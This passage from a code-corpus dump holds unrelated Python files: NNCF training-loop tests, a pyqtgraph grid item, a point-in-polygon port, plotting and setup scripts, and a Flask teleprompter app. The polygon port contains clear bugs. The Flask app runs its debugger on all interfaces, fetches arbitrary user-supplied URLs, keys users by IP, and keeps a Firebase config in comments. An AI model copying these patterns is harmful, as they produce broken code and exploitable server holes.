optimizer,\n train_loader=train_loader, **kwargs):\n with set_torch_seed():\n train_loader = iter(train_loader)\n for _ in range(num_steps):\n compression_ctrl.scheduler.step()\n optimizer.zero_grad()\n x, y_gt = next(train_loader)\n y = model(x)\n loss = F.mse_loss(y.sum(), y_gt)\n loss.backward()\n optimizer.step()\n\n def configure_optimizers_fn():\n optimizer = SGD(model.parameters(), lr=learning_rate)\n return optimizer, None\n\n acc_aware_training_loop = AdaptiveCompressionTrainingLoop(config, compression_ctrl)\n model = acc_aware_training_loop.run(model,\n train_epoch_fn=train_fn,\n validate_fn=partial(validate_fn, train_loader=train_loader),\n configure_optimizers_fn=configure_optimizers_fn)\n assert compression_ctrl.compression_rate == pytest.approx(final_compression_rate, 1e-3)\n assert validate_fn(model, train_loader=train_loader) == pytest.approx(reference_final_metric, 1e-4)\n\n\n@pytest.mark.parametrize(\n 'max_accuracy_degradation',\n (({'maximal_relative_accuracy_degradation': 30.0}), ({'maximal_relative_accuracy_degradation': 1.0}),\n ({'maximal_absolute_accuracy_degradation': 0.30}), ({'maximal_absolute_accuracy_degradation': 0.05}))\n)\ndef test_early_exit_training_loop(max_accuracy_degradation,\n num_steps=10, learning_rate=1e-3,\n maximal_total_epochs=100,\n init_finetuning_steps=10):\n def validate_fn(model, epoch=0, train_loader=None):\n with set_torch_seed():\n train_loader = iter(train_loader)\n loss = torch.FloatTensor([0])\n with torch.no_grad():\n for _ in range(num_steps):\n x, y_gt = next(train_loader)\n y = model(x)\n loss += F.mse_loss(y.sum(), y_gt)\n return 1 - loss.item()\n\n config = get_quantization_config_without_range_init(LeNet.INPUT_SIZE[-1])\n params = {\n \"maximal_total_epochs\": maximal_total_epochs,\n }\n params.update(max_accuracy_degradation)\n\n accuracy_aware_config = {\n \"accuracy_aware_training\": {\n \"mode\": \"early_exit\",\n \"params\": params\n }\n }\n\n config.update(accuracy_aware_config)\n\n model, train_loader, compression_ctrl = create_finetuned_lenet_model_and_dataloader(config,\n validate_fn,\n init_finetuning_steps)\n\n def train_fn(compression_ctrl, model, epoch, optimizer, lr_scheduler,\n train_loader=train_loader):\n with set_torch_seed():\n train_loader = iter(train_loader)\n for _ in range(num_steps):\n compression_ctrl.scheduler.step()\n optimizer.zero_grad()\n x, y_gt = next(train_loader)\n y = model(x)\n loss = F.mse_loss(y.sum(), y_gt)\n loss.backward()\n optimizer.step()\n\n def configure_optimizers_fn():\n optimizer = SGD(model.parameters(), lr=learning_rate)\n return optimizer, None\n\n early_stopping_training_loop = EarlyExitCompressionTrainingLoop(config, compression_ctrl)\n model = early_stopping_training_loop.run(model,\n train_epoch_fn=train_fn,\n validate_fn=partial(validate_fn, train_loader=train_loader),\n configure_optimizers_fn=configure_optimizers_fn)\n original_model_accuracy = model.original_model_accuracy\n compressed_model_accuracy = validate_fn(model, train_loader=train_loader)\n if \"maximal_absolute_accuracy_degradation\" in max_accuracy_degradation:\n assert (original_model_accuracy - compressed_model_accuracy) <= \\\n max_accuracy_degradation[\"maximal_absolute_accuracy_degradation\"]\n else:\n assert (original_model_accuracy - compressed_model_accuracy) / original_model_accuracy * 100 <= \\\n max_accuracy_degradation[\"maximal_relative_accuracy_degradation\"]\n\n\n@pytest.mark.parametrize(\n ('max_accuracy_degradation', 'exit_epoch_number'),\n (({'maximal_relative_accuracy_degradation': 1.0}, 6),\n ({'maximal_relative_accuracy_degradation': 30.0}, 10),\n ({'maximal_absolute_accuracy_degradation': 0.1}, 3))\n)\ndef test_early_exit_with_mock_validation(max_accuracy_degradation, exit_epoch_number,\n maximal_total_epochs=100):\n epoch_counter = 0\n\n def mock_validate_fn(model, init_step=False, epoch=0):\n original_metric = 0.85\n if init_step:\n return original_metric\n nonlocal epoch_counter\n epoch_counter = epoch\n if \"maximal_relative_accuracy_degradation\" in max_accuracy_degradation:\n return original_metric * (1 - 0.01 * max_accuracy_degradation['maximal_relative_accuracy_degradation']) * (\n epoch / exit_epoch_number)\n return (original_metric - max_accuracy_degradation['maximal_absolute_accuracy_degradation']) * \\\n epoch / exit_epoch_number\n\n config = get_quantization_config_without_range_init(LeNet.INPUT_SIZE[-1])\n\n params = {\n \"maximal_total_epochs\": maximal_total_epochs\n }\n params.update(max_accuracy_degradation)\n accuracy_aware_config = {\n \"accuracy_aware_training\": {\n \"mode\": \"early_exit\",\n \"params\": params\n }\n }\n\n config.update(accuracy_aware_config)\n\n train_loader = create_ones_mock_dataloader(config, num_samples=10)\n model = LeNet()\n\n config = register_default_init_args(config,\n train_loader=train_loader,\n model_eval_fn=partial(mock_validate_fn, init_step=True))\n\n model, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n\n def train_fn(compression_ctrl, model, epoch, optimizer, lr_scheduler,\n train_loader=train_loader):\n pass\n\n def configure_optimizers_fn():\n return None, None\n\n early_stopping_training_loop = EarlyExitCompressionTrainingLoop(config, compression_ctrl,\n dump_checkpoints=False)\n model = early_stopping_training_loop.run(model,\n train_epoch_fn=train_fn,\n validate_fn=partial(mock_validate_fn),\n configure_optimizers_fn=configure_optimizers_fn)\n # Epoch number starts from 0\n assert epoch_counter == exit_epoch_number\n\n\n@pytest.mark.parametrize('aa_config', (\n {\n \"accuracy_aware_training\": {\n \"mode\": \"early_exit\",\n \"params\": {\n \"maximal_relative_accuracy_degradation\": 1,\n \"maximal_total_epochs\": 1,\n }\n },\n \"compression\": [\n {\n \"algorithm\": \"filter_pruning\",\n },\n {\n \"algorithm\": \"rb_sparsity\",\n }\n ]\n },\n {\n \"accuracy_aware_training\": {\n \"mode\": \"adaptive_compression_level\",\n \"params\": {\n \"maximal_relative_accuracy_degradation\": 1,\n \"initial_training_phase_epochs\": 1,\n \"maximal_total_epochs\": 1,\n \"patience_epochs\": 10\n }\n },\n \"compression\": [\n {\n \"algorithm\": \"filter_pruning\",\n }\n ]\n }\n)\n )\ndef test_mock_dump_checkpoint(aa_config):\n is_called_dump_checkpoint_fn = False\n\n def mock_dump_checkpoint_fn(model, compression_controller, accuracy_aware_runner, aa_log_dir):\n from nncf.api.compression import CompressionAlgorithmController\n from nncf.common.accuracy_aware_training.runner import TrainingRunner\n assert isinstance(model, torch.nn.Module)\n assert isinstance(compression_controller, CompressionAlgorithmController)\n assert isinstance(accuracy_aware_runner, TrainingRunner)\n assert isinstance(aa_log_dir, str)\n nonlocal is_called_dump_checkpoint_fn\n is_called_dump_checkpoint_fn = True\n\n config = get_quantization_config_without_range_init(LeNet.INPUT_SIZE[-1])\n train_loader = create_ones_mock_dataloader(aa_config, num_samples=10)\n model = LeNet()\n config.update(aa_config)\n\n def train_fn(compression_ctrl, model, epoch, optimizer, lr_scheduler,\n train_loader=train_loader):\n pass\n\n def mock_validate_fn(model, init_step=False, epoch=0):\n return 80\n\n def configure_optimizers_fn():\n optimizer = SGD(model.parameters(), lr=0.001)\n return optimizer, None\n\n config = register_default_init_args(config,\n train_loader=train_loader,\n model_eval_fn=partial(mock_validate_fn, init_step=True))\n\n model, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n\n early_stopping_training_loop = EarlyExitCompressionTrainingLoop(config, compression_ctrl,\n dump_checkpoints=True)\n model = early_stopping_training_loop.run(model,\n train_epoch_fn=train_fn,\n validate_fn=partial(mock_validate_fn),\n configure_optimizers_fn=configure_optimizers_fn,\n dump_checkpoint_fn=mock_dump_checkpoint_fn)\n assert is_called_dump_checkpoint_fn\n","sub_path":"tests/torch/accuracy_aware_training/test_training_loop.py","file_name":"test_training_loop.py","file_ext":"py","file_size_in_byte":14790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"544262081","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.12-x86_64/egg/dicom_tools/pyqtgraph/opengl/items/GLGridItem.py\n# Compiled at: 2018-05-21 04:28:19\n# Size of source mod 2**32: 2277 bytes\nimport numpy as np\nfrom OpenGL.GL import *\nfrom ..GLGraphicsItem import GLGraphicsItem\nfrom ... import QtGui\n__all__ = [\n 'GLGridItem']\n\nclass GLGridItem(GLGraphicsItem):\n __doc__ = '\\n **Bases:** :class:`GLGraphicsItem `\\n \\n Displays a wire-grame grid. \\n '\n\n def __init__(self, size=None, color=None, antialias=True, glOptions='translucent'):\n GLGraphicsItem.__init__(self)\n self.setGLOptions(glOptions)\n self.antialias = antialias\n if size is None:\n size = QtGui.QVector3D(20, 20, 1)\n self.setSize(size=size)\n self.setSpacing(1, 1, 1)\n\n def setSize(self, x=None, y=None, z=None, size=None):\n \"\"\"\n Set the size of the axes (in its local coordinate system; this does not affect the transform)\n Arguments can be x,y,z or size=QVector3D().\n \"\"\"\n if size is not None:\n x = size.x()\n y = size.y()\n z = size.z()\n self._GLGridItem__size = [\n x, y, z]\n self.update()\n\n def size(self):\n return self._GLGridItem__size[:]\n\n def setSpacing(self, x=None, y=None, z=None, spacing=None):\n \"\"\"\n Set the spacing between grid lines.\n Arguments can be x,y,z or spacing=QVector3D().\n \"\"\"\n if spacing is not None:\n x = spacing.x()\n y = spacing.y()\n z = spacing.z()\n self._GLGridItem__spacing = [\n x, y, z]\n self.update()\n\n def spacing(self):\n return self._GLGridItem__spacing[:]\n\n def paint(self):\n self.setupGLState()\n if self.antialias:\n glEnable(GL_LINE_SMOOTH)\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n glHint(GL_LINE_SMOOTH_HINT, GL_NICEST)\n glBegin(GL_LINES)\n x, y, z = self.size()\n xs, ys, zs = self.spacing()\n xvals = np.arange(-x / 2.0, x / 2.0 + xs * 0.001, xs)\n yvals = np.arange(-y / 2.0, y / 2.0 + ys * 0.001, ys)\n glColor4f(1, 1, 1, 0.3)\n for x in xvals:\n glVertex3f(x, yvals[0], 0)\n glVertex3f(x, yvals[(-1)], 0)\n\n for y in yvals:\n glVertex3f(xvals[0], y, 0)\n glVertex3f(xvals[(-1)], y, 0)\n\n glEnd()","sub_path":"pycfiles/dicom_tools-2.5-py3.7/GLGridItem.cpython-37.py","file_name":"GLGridItem.cpython-37.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357831646","text":"from packages.turf_invariant import get_coord\n\n# http://en.wikipedia.org/wiki/Even%E2%80%93odd_rule\n# modified from: https://github.com/substack/point-in-polygon/blob/master/index.js\n# which was modified from http://www.ecse.rpi.edu/Homepages/wrf/Research/Short_Notes/pnpoly.html\n\n# Takes a {@link Point} and a {@link Polygon} or {@link MultiPolygon}\n# and determines if the point resides inside the polygon. The polygon can\n# be convex or concave. The function accounts for holes.\n#\n# @name inside\n# @param {Feature} point input point\n# @param {Feature<(Polygon|MultiPolygon)>} polygon input polygon\n# or multipolygon\n# @return {Boolean} `true` if the Point is inside the Polygon; `false` if\n# the Point is not inside the Polygon\n# @example\n# var pt = point([-77, 44]);\n# var poly = polygon([[\n# [-81, 41],\n# [-81, 47],\n# [-72, 47],\n# [-72, 41],\n# [-81, 41]\n# ]]);\n#\n# var isInside = turf.inside(pt, poly);\n#\n# //=isInside\n#\ndef input(point, polygon):\n pt = get_coord(point)\n polys = polygon[\"geometry\"][\"coordinates\"]\n # normalize to multipolygon\n if polygon.geometry.type == 'Polygon':\n polys = [polys]\n\n inside_poly = False\n for i in range(len(polys)):\n if inside_poly:\n break\n # check if it is in the outer ring first\n if in_ring(pt, polys[i][0]):\n in_hole = False\n k = 1\n # check for the point in any of the holes\n while k < polys[i].length and not in_hole:\n if in_ring(pt, polys[i][k]):\n in_hole = True\n k += 1\n if not in_hole:\n inside_poly = True\n return inside_poly\n\n\n# pt is [x,y] and ring is [[x,y], [x,y],..]\ndef in_ring(pt, ring):\n is_inside = False\n j = len(ring) - 1\n for i in range(len(ring)):\n xi = ring[i][0], yi = ring[i][1]\n xj = ring[j][0], yj = ring[j][1]\n intersect = ((yi > pt[1]) != (yj > pt[1])) and \\\n (pt[0] < (xj - xi) * (pt[1] - yi) / (yj - yi) + xi)\n if intersect:\n is_inside = not is_inside\n j = i + 1\n\n return is_inside\n","sub_path":"packages/turf_inside/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"423905927","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nn_ancilla = 1\nn_post = 0\nshould_save = True\n\ndata_sets = ['sin', 'sinc', 'x_cubed']\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n# plt.figure(figsize=(8*3, 5))\n\nfor k in range(3):\n res_folder = os.path.join(os.curdir, 'results',\n '{}-{}-{}'.format(data_sets[k], n_ancilla, n_post))\n\n if len(os.sys.argv) > 2:\n should_save = bool(int(os.sys.argv[2]))\n qualifier = \"Will\" if should_save else \"Won't\"\n print(qualifier + \" save plot\")\n\n # Load in network outputs\n output_file = os.path.join(res_folder, 'output.npz')\n with np.load(output_file) as f:\n loss = f['loss']\n\n # plt.subplot(1, 3, k+1)\n\n # Plot losses\n plt.plot(loss)\n\n plt.xlabel(\"Step\", fontsize=16)\n if k == 0:\n plt.ylabel(\"Loss\", fontsize=16)\n\nplt.legend([r'$\\sin(x)$', r'$\\mathrm{sinc}(x)$', r'$x^3$'], fontsize=16)\nplt.title(r'$(n_{\\mathrm{in}}, n_{\\mathrm{post}}) = ('\n + str(n_ancilla) + ', ' + str(n_post) + r')$',\n fontsize=18)\nplt.xlim([0, 2000])\n\nif should_save:\n save_path = os.path.join('results', \"losses-{}-{}.eps\".format(n_ancilla, n_post))\n plt.savefig(save_path, bbox_inches='tight')\n print(\"Saved plot to: \" + save_path)\n\nplt.show()\n","sub_path":"curve_fit/plot_all_losses.py","file_name":"plot_all_losses.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"60405606","text":"from distutils.core import setup\ntry:\n from setuptools import find_packages\n packages = find_packages()\nexcept ImportError:\n import os\n packages = [x.strip('./').replace('/','.') for x in os.popen('find -name \"__init__.py\" | xargs -n1 dirname').read().strip().split('\\n')]\n\nsetup(\n name='cfg-explorer',\n version='0.0.1',\n author='Attila Axt',\n author_email='axt@load.hu',\n license='BSD',\n platforms=['Linux'],\n packages=packages,\n install_requires=[\n 'argparse',\n 'angr',\n 'bingraphvis'\n ],\n description='CFG explorer',\n long_description='CFG explorer',\n url='https://github.com/axt/cfg-explorer',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"266934740","text":"from flask import Flask, render_template, url_for, request, redirect, flash\n# import pyrebase\nimport os\nfrom avatar import crop\nfrom speed import toPercentValue, toSpeedValue\nimport requests\nimport json\n\napp = Flask(\n __name__,\n template_folder='templates',\n static_folder='static'\n)\n\n# config = {\n# 'apiKey': \"AIzaSyA3ZYaV-3uJmusX3-nfV71CT5pbjyLqbtY\",\n# 'authDomain': \"teleprompterandroidjava.firebaseapp.com\",\n# 'databaseURL': \"https://teleprompterandroidjava-default-rtdb.europe-west1.firebasedatabase.app\",\n# 'projectId': \"teleprompterandroidjava\",\n# 'storageBucket': \"teleprompterandroidjava.appspot.com\",\n# 'messagingSenderId': \"300471537841\",\n# 'appId': \"1:300471537841:web:de99d6f9e4316faeddd290\",\n# 'measurementId': \"G-Y3RVRFQ01W\"\n# }\n\n# app.config['SECRET_KEY'] = config['apiKey']\n\n# firebase = pyrebase.initialize_app(config)\n# auth = firebase.auth()\n# db = firebase.database()\n# storage = firebase.storage()\n\n\nuserId = ''\ncurrent_user = dict()\n\nuserIdsDict = {}\n\n\ndef sign_out():\n # Удаляем предыдущий аватар, если он еще сохранен\n try:\n os.remove('static/images/avatar.jpeg')\n except:\n print('Can\\'t remove avatar')\n global userId\n global current_user\n userId = ''\n current_user = dict()\n\n\nsign_out()\n\n\n@app.route('/home')\ndef home():\n return redirect('/')\n\n\n@app.route('/exception')\ndef exception():\n return render_template('exception.html')\n\n\n@app.route('/to-speed-value')\ndef tospeedvalue():\n speedGot = int(request.args['speedGot'])\n return str(toSpeedValue(speedGot))\n\n\n@app.route('/to-percent-value')\ndef topercentvalue():\n speedGot = int(request.args['speedGot'])\n return str(toPercentValue(speedGot))\n\n\n@app.route('/save-user-id', methods=['POST', 'GET'])\ndef saveuserid():\n global userIdsDict\n if request.method == 'POST':\n user_id_got = request.form['userid']\n userIdsDict[request.remote_addr] = user_id_got\n print(userIdsDict)\n return redirect('/')\n\n\n@app.route('/get-user-id')\ndef getuserid():\n global userIdsDict\n user_id = '-1'\n try:\n user_id = userIdsDict[request.remote_addr]\n print(user_id)\n except Exception as e:\n print(e)\n return user_id\n\n\n@app.route('/auth')\ndef auth():\n return render_template('index-guest.html')\n\n\n@app.route('/sign-out')\ndef signout():\n try:\n userIdsDict[request.remote_addr] = '-1'\n except:\n print('Exception')\n return redirect('/')\n\n\n@app.route('/for-html-tests')\ndef forhtmltests():\n return render_template('index-guest.html')\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n# def index():\n# name = ''\n# global current_user\n# global userId\n# if current_user != dict():\n# userId = current_user['localId']\n# print('Signed in')\n# if userId != '':\n# # print('Trying to get name...')\n# # name = db.child(\"users\").child(userId).child('name').get().val()\n# if os.path.exists('static/images/avatar.jpeg'):\n# return render_template('index.html', name=name, downloaded=True, user_id=userId)\n# else:\n# return render_template('index.html', name=name, downloaded=False, user_id=userId)\n# else:\n# return render_template('index-guest.html')\n\n\n@app.route('/about')\ndef about():\n return 'About page'\n\n\n# @app.route('/files-list')\n# def filesList():\n# if current_user != dict() and userId != '':\n# return render_template('test.html', user_id=userId)\n# else:\n# return redirect('/')\n\n\n# @app.route('/create', methods=[\"GET\", \"POST\"])\n# def create():\n# if current_user != dict() and userId != '':\n# if request.method == 'POST':\n# editor = request.form['editor']\n# if request.form['title'] != '':\n# fileName = request.form['title'] + '.html'\n# else:\n# return render_template('edit.html', content=editor, title=\"\", notitle=True)\n# file = open('static/files/' + fileName, 'w')\n# file.write(editor)\n# file.close()\n# fullFileName = userId + '/files/' + fileName\n# storage.child(fullFileName).put('static/files/' + fileName)\n# os.remove('static/files/' + fileName)\n# flash('Изменения сохранены!')\n# return render_template('edit.html', content=editor, title=fileName[:fileName.rfind('.')], notitle=False)\n# else:\n# # Для тестов: zVElAdFPEiUd3FwL2Y08snmk2wZ2/TestForServer.html\n# return render_template('edit.html', content=\"\", title=\"\", notitle=True)\n# else:\n# return redirect('/')\n\n\n@app.route('/edit//', methods=['POST', 'GET'])\ndef edit(localId, fileName):\n return render_template('download.html', localId=localId, fileName=fileName)\n\n\n# def edit(localId, fileName):\n# if current_user != dict() and userId != '':\n# if request.method == 'POST':\n# editor = request.form['editor']\n# fileName = request.form['title'] + '.html'\n# file = open('static/files/' + fileName, 'w')\n# file.write(editor)\n# file.close()\n# fullFileName = localId + '/files/' + fileName\n# storage.child(fullFileName).put('static/files/' + fileName)\n# os.remove('static/files/' + fileName)\n# flash('Изменения сохранены!')\n# return render_template('edit.html', content=editor, title=fileName[:fileName.rfind('.')], notitle=False)\n# else:\n# if localId == userId:\n# # Если id пользователя (который вошел на сайт под своим логином и паролем) совпадает с id пользователя, загрузившего документ (то есть, пользователь хочет просмотреть свой документ, а не чужой), то все нормально, можно открывать страницу редактирования\n# # Для тестов: zVElAdFPEiUd3FwL2Y08snmk2wZ2/TestForServer.html\n# print('We are ready to download a file!')\n# print(localId)\n# print(fileName)\n# fullFileName = localId + '/files/' + fileName\n# storage.child(fullFileName).download('static/files/' + fileName)\n# file = open('static/files/' + fileName)\n# content = file.read()\n# file.close()\n# os.remove('static/files/' + fileName)\n# return render_template('edit.html', content=content, title=fileName[:fileName.rfind('.')], notitle=False)\n# else:\n# return render_template('exception.html')\n# else:\n# return redirect('/')\n@app.route('/create')\n@app.route('/get-file-content', methods=['POST', 'GET'])\ndef getfilecontent():\n # data = request.data\n # dataDict = json.loads(data)\n # url = dataDict['url']\n if request.method == 'POST':\n url = request.form['url']\n title = request.form['title']\n send_request = requests.get(url)\n return render_template('edit.html', content=send_request.content.decode('utf-8'),\n title=title[:title.rfind('.')])\n else:\n return render_template('edit.html', content='', title='Rename me!')\n\n\n@app.route('/settings', methods=['POST', 'GET'])\ndef settings():\n return render_template('settings.html')\n\n\n# def settings():\n# if current_user != dict() and userId != '':\n# if request.method == 'POST':\n# # Сохранение настроек\n# textColor = request.form['textColor']\n# textSize = request.form['textSize']\n# bgColor = request.form['bgColor']\n# speed = request.form['speed']\n# speed = str(toSpeedValue(int(speed)))\n\n# try:\n# dbPath = 'users/' + userId + '/settings/'\n# settingsDict = {\n# \"textColor\": str(textColor),\n# \"textSize\": str(textSize),\n# \"bgColor\": str(bgColor),\n# \"speed\": speed\n# }\n# db.child(dbPath).set(settingsDict)\n\n# flash('Изменения сохранены!')\n# return redirect('/settings')\n# except:\n# return render_template('exception.html') \n# else:\n# # Получение настроек\n# textColor = '0'\n# textSize = '16'\n# bgColor = '1'\n# speed = '1'\n\n# dbPath = 'users/' + userId + '/settings/'\n# textSize = db.child(dbPath + 'textSize').get(current_user['idToken']).val()\n# textColor = db.child(dbPath + 'textColor').get(current_user['idToken']).val()\n# speed = db.child(dbPath + 'speed').get(current_user['idToken']).val()\n# bgColor = db.child(dbPath + 'bgColor').get(current_user['idToken']).val()\n\n# speed = str(toPercentValue(int(speed)))\n\n# return render_template('settings.html', bgColor=bgColor, textColor=textColor, textSize=textSize, speed=speed, user_id=userId)\n# else:\n# return redirect('/')\n\n# @app.route('/login', methods=['POST', 'GET'])\n# def login():\n# global current_user\n# global userId\n# if current_user == dict() or userId == '':\n# if request.method == 'POST':\n# email = request.form['email']\n# password = request.form['password']\n# print(email, password)\n# try:\n# current_user = auth.sign_in_with_email_and_password(email, password)\n# userId = current_user['localId']\n# # downloadAvatar(storage, current_user)\n# return redirect('/')\n# except:\n# return render_template('exception.html')\n# else:\n# return render_template('login.html')\n# else:\n# sign_out()\n# return redirect('/login')\n\n\n# @app.route('/signup', methods=['POST', 'GET'])\n# def signup():\n# global current_user\n# global userId\n# if current_user == dict() or userId == '':\n# if request.method == 'POST':\n# email = request.form['email']\n# password = request.form['password']\n# name = request.form['name']\n# print(email, password, name)\n# try:\n# current_user = auth.create_user_with_email_and_password(email, password)\n# userId = current_user['localId']\n# print(userId)\n\n# # Сохраняем имя\n# db.child('users/'+userId+'/name').set(name)\n# db.child('users/'+userId+'/email').set(email)\n# return redirect('/')\n# except:\n# return render_template('exception.html')\n# else:\n# return render_template('signup.html')\n# else:\n# sign_out()\n# return redirect('/signup')\n\n\n# @app.route('/save-avatar', methods=['POST'])\n# def saveavatar():\n# avatarFile = request.files['avatarFile']\n# avatarFile.save('static/images/avatar.jpeg')\n# crop()\n# # uploadAvatar(storage, current_user)\n# return redirect('/')\n\n\n@app.route('/get-cropped-avatar', methods=['POST'])\ndef getcroppedavatar():\n avatarFile = request.files['avatarFile']\n avatarFile.save('static/images/avatar.jpeg')\n crop()\n with open('static/images/avatar.jpeg', 'rb') as image:\n f = image.read()\n b = bytearray(f)\n os.remove('static/images/avatar.jpeg')\n return b\n\n\n@app.route('/profile', methods=['POST', 'GET'])\n# def profile():\n# if current_user != dict() and userId != '':\n# if request.method == 'POST':\n# # Сохранение имени\n# name = request.form['name']\n# try:\n# dbPath = 'users/' + userId + '/name'\n# db.child(dbPath).set(name)\n# flash('Изменения сохранены!')\n# return redirect('/profile')\n# except:\n# return render_template('exception.html') \n# else:\n# # Получение настроек\n# dbPath = 'users/' + userId + '/name'\n# name = db.child(dbPath).get().val()\n# if os.path.exists('static/images/avatar.jpeg'):\n# return render_template('profile.html', name=name, downloaded=True)\n# else:\n# return render_template('profile.html', name=name, downloaded=False)\n# else:\n# return redirect('/')\ndef profile():\n return render_template('profile.html')\n\n\nif __name__ == \"__main__\":\n app.run(\n host='0.0.0.0',\n port=8080,\n debug=True\n )\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"46289011","text":"import pygame\n\npygame.init()\n\n#화면 크기 설정\nscreen_width = 480\nscreen_height = 640 #세로 크기\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\n#화면 타이틀 설정\\\npygame.display.set_caption(\"abc\")\n\n#배경이미지 불러오기\nbackground = pygame.image.load(\"C:\\\\Users\\\\mussy\\\\OneDrive\\\\바탕 화면\\\\PythonStudy\\\\pygame_basic\\\\background.png\")\n\n#이벤트 루프\nrunning = True\nwhile running:\n for event in pygame.event.get(): #이벤트가 발생하였는가\n if event.type == pygame.QUIT: #창을 닫았을 때\n running = False\n\n screen.blit(background, (0, 0)) #x, y 위치에 배경그리기\n\n pygame.display.update() # 게임화면을 다시 그리기\n\n#pygame 종료\npygame.quit()\n","sub_path":"pygame_basic/2_background.py","file_name":"2_background.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396053957","text":"\"\"\"\nVarious routines that are too slow to run in real time are tabulated here.\n\nEspecially of note are Lena's ssWLC parameters code, which nobody has access to\nanymore to the best of my knowledge (except Andy, who doesn't know how to use\nit) and Tom's Rouse velocity cross-correlation code, which required an entire\nrotation student to even run back when it did exist. I think it's saved under\nsome folder called ParConV4, but I haven't put in the time to try to figure out\nif it's usable.\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport scipy\n\nfrom pathlib import Path\n\n# precomupted velocity cross-correlation for rouse polymer\n# from Lampo et al, was pre-computed on a grid...\ndeltas_ = np.linspace(-3, 3, 25) # for corresponding values in logspace\nalphas_ = np.linspace(0.25, 1, 31) # steps of 0.025\ntOverDeltas_ = np.linspace(0, 5, 501) # steps of 0.01\nvvcf_table_ = np.reshape(np.loadtxt(\n Path(__file__).parent / Path('vvcf_table.csv'), delimiter=','\n ), (31, 25, 501))\n\n\ndef calc_vel_corr_fixed_(tOverDelta, deltaOverTDeltaN, alpha):\n \"\"\"Perform interpolation in logspace for \"delta\"/deltaOverTDeltaN.\"\"\"\n deltaOverTDeltaN = np.log10(deltaOverTDeltaN)\n return scipy.interpolate.interpn((alphas_, deltas_, tOverDeltas_),\n vvcf_table_,\n (alpha, deltaOverTDeltaN, tOverDelta))\n\n\ncalc_vel_corr_fixed_.vvcf = None\nfrac_vel_corr = np.vectorize(calc_vel_corr_fixed_)\n\ndsswlc_params = pd.read_csv(Path(__file__).parent / Path('dssWLCparams'),\n sep=' ', header=None)\ndsswlc_params.columns = ['DEL', 'EB', 'GAM', 'EPAR', 'EPERP', 'ETA', 'XIU',\n 'UNKNOWN']\n\n\ndef dsswlc_from_del(delta):\n \"\"\"\n Get dsswlc sim params by interpolating Lena's tabulated values.\n\n Parameters\n ----------\n DEL : float\n Number of persistence lengths between each pair of beads.\n\n Returns\n -------\n ('EB', 'GAM', 'EPAR', 'EPERP', 'ETA', 'XIU', 'UNKNOWN')\n Parameters of the dsswlc for simulation.\n \"\"\"\n return [np.interp(delta, dsswlc_params['DEL'], dsswlc_params[col])\n for col in dsswlc_params.columns[1:]]\n","sub_path":"wlcsim/tabulation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275405800","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom scheduling.views import EmployeeViewSet, AppointmentViewSet, CompanyViewSet\n\nrouter = routers.DefaultRouter()\nrouter.register(r'employees', EmployeeViewSet, base_name='employee')\nrouter.register(r'appointments', AppointmentViewSet, base_name='appointment')\nrouter.register(r'companies', CompanyViewSet, base_name='company')\n\nurlpatterns = [\n path(r'', include(router.urls)),\n path(r'admin/', include('scheduling.api_admin.urls')),\n path(r'', include('rest_framework.urls', namespace='rest_framework'))\n]\n","sub_path":"scheduling/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215216984","text":"import os\nimport os.path\nimport shutil\nimport time, datetime\n\n\n\n#拷贝sourceDir目录下的文件,到targetDir下\ndef copyFiles(sourceDir, targetDir):\n if sourceDir.find(\".svn\") > 0:\n return\n for file in os.listdir(sourceDir):\n sourceFile = os.path.join(sourceDir, file)\n targetFile = os.path.join(targetDir, file)\n if os.path.isfile(sourceFile):\n if not os.path.exists(targetDir):\n os.makedirs(targetDir)\n if not os.path.exists(targetFile) or(os.path.exists(targetFile) and (os.path.getsize(targetFile) != os.path.getsize(sourceFile))):\n open(targetFile, \"wb\").write(open(sourceFile, \"rb\").read())\n if os.path.isdir(sourceFile):\n First_Directory = False\n copyFiles(sourceFile, targetFile)\n\n#复制某一个文件夹下所有文件到另一目录\ndef coverFiles(sourceDir, targetDir):\n for file in os.listdir(sourceDir):\n sourceFile = os.path.join(sourceDir, file)\n targetFile = os.path.join(targetDir, file)\n # cover the files\n if os.path.isfile(sourceFile):\n open(targetFile, \"wb\").write(open(sourceFile, \"rb\").read())\n\n\n\n\nif __name__ == \"__main__\":\n #image2 为test2下的 image文件夹中的照片数目\n image1path = \"D:\\\\py_buffer\\\\docx_Pro\\\\test1\\\\word\\\\media\\\\\"\n image2path = 